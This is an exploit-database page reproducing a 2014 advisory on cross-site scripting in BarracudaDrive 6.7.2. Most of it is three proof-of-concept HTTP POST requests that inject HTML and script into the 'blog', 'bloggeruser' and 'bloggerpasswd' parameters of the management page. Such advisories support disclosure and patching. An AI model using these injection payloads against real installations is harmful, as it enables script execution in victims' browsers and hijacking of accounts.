[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BarracudaDrive 6.7.2 Cross Site Scripting Vulnerability

Author
Manish Tanwar
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-22259
Category
web applications
Date add
16-05-2014
Platform
windows
############################################################################### 
# Exploit Title : BarracudaDrive Content Management System Multiple XSS Vulnerabilities 
# Author        : Manish Kishan Tanwar  
# Vendor        : http://barracudadrive.com 
# Software      : BarracudaDrive 6.7.2 
# Date          : 15/05/2014 
#Discovered At  : IndiShell LAB (indishell.in aka indian cyber army)
#Love to        : zero cool,Team indishell,Hardeep Singh
############################################################################## 

//////////////////////////////////// 
//  Overview of vulnerability    ///
////////////////////////////////////
BarracudaDrive Multiple Reflected and Persistent Cross-site Scripting Vulnerabilities. 

Reflected and Persistent Cross-Site Scripting vulnerabilities  in BarracudaDrive, because it does not checking user user inputs before final processing. 

 1) Input passed via the "blog" parameter to "private/manage/" is not  properly verified before it is givem to server for processing. This can be exploited to execute arbitrary HTML and script code.

 2) Input passed via the "bloggeruser" parameter to "private/manage/" is not  properly verified before it is givem to server for processing. This can be exploited to execute arbitrary HTML and script code.

 3) Input passed via the "bloggerpasswd" parameter to "private/manage/" is not  properly verified before it is givem to server for processing. This can be exploited to execute arbitrary HTML and script code.

///////////////////////////////
//   Proof of Concept: -
///////////////////////////////

1).
http://localhost/private/manage/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/
Cookie: z9ZAqJtI=3176979a5371fd10
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 143

IsPublic=true&ShowLogin=on&GoogleAnalytics=&theme=BarracudaDriveb&blog=Blog"><h1>hi</h1>&msgrsskey=&bloggeruser=my_username&bloggerpasswd=my_password&fbkey=&fblink=Add+a+comment


2).
http://localhost/private/manage/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/
Cookie: z9ZAqJtI=3176979a5371fd10
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 143

IsPublic=true&ShowLogin=on&GoogleAnalytics=&theme=BarracudaDriveb&blog=Blog&msgrsskey=&bloggeruser=p"><marquee>hi</marquee>&bloggerpasswd=my_password&fbkey=&fblink=Add+a+comment

3).
http://localhost/private/manage/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/
Cookie: z9ZAqJtI=3176979a5371fd10
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 143

IsPublic=true&ShowLogin=on&GoogleAnalytics=&theme=BarracudaDriveb&blog=Blog&msgrsskey=&bloggeruser=my_username&bloggerpasswd=p"><script>alert(123);</script>&fbkey=&fblink=Add+a+comment

#  0day.today [2024-10-05]  #